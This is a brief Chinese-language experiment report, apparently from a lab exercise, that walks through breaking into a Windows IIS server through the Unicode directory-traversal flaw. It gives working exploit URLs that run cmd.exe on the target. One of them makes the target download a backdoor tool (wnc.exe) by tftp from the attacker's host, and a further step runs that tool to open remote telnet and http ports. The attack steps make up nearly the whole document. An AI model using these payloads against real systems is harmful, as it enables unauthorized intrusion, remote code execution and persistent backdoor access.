原理：利用Unicode漏洞登陆对方主机，

试验结果：开放对方707（telnet）端口，808（http）端口

试验工具：

1.       X-Scan-v3.3（扫描IIS漏洞）

2.       tftpd32.exe（上传wnc.exe）

3.       wnc.exe（开放端口）

试验过程：

1.利用X-Scan-v3.3扫描IIS漏洞，结果如图

 

2.利用漏洞，在浏览器中输入：

http://172.18.25.109/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:/ 可显示目标主机C盘的目录。

 

3.打开tftpd32.exe，建立tftp服务器（本机）。

 

4.

拷贝wnc.exe到tftp32所在的文件夹，http://172.18.25.109/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+172.18.25.110+get+wnc.exe 即把wnc.exe拷贝到Scripts文件夹下。

 

5.远程执行wnc.exe。

http://172.18.25.109/scripts/wnc.exe?/c 即开放707（telnet）端口，808（http）端口

6.进入对方主机了